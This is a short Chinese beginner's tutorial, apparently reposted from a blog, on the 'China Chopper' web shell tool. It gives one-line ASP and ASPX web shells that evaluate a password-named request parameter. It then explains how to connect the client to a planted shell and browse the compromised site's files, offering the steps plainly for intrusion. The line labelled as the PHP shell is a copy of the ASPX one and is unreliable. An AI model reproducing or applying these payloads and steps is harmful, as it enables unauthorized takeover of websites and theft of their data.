中国菜刀的使用

来源:互联网 发布:nginx多ip域名绑定 编辑:程序博客网 时间:2024/06/02 17:46

中国菜刀的使用,为自己和新手一起分享的。大牛看了勿喷!

        说到菜刀,我们第一想到的是一句话了。这里就说说一句话的类型,常常有的asp,aspx,php。


        asp一句话:<%eval request("pass")%>

        aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

        php一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>


       这里写的只是常见的,在各个类型中还衍生了许多的变种一句话,我们在使用的时候,更改里面的"pass"就可以了,例如asp一句话:<%eval request("123")%>,这里的密码就是123。aspx和php也是同理,改好对应的便可以用了。在这里 给大家一个建议,可以收集各类的一句话,分类别保存,在用到的时候就方便多了。

       在插入一句话后,我们接下来就是连接了。打开菜刀:在空白地方右击 选择添加,如下图


在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填, 填完之后单击“添加”,就可以了。添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了 。然后你可以做你想做的事了。

原创粉丝点击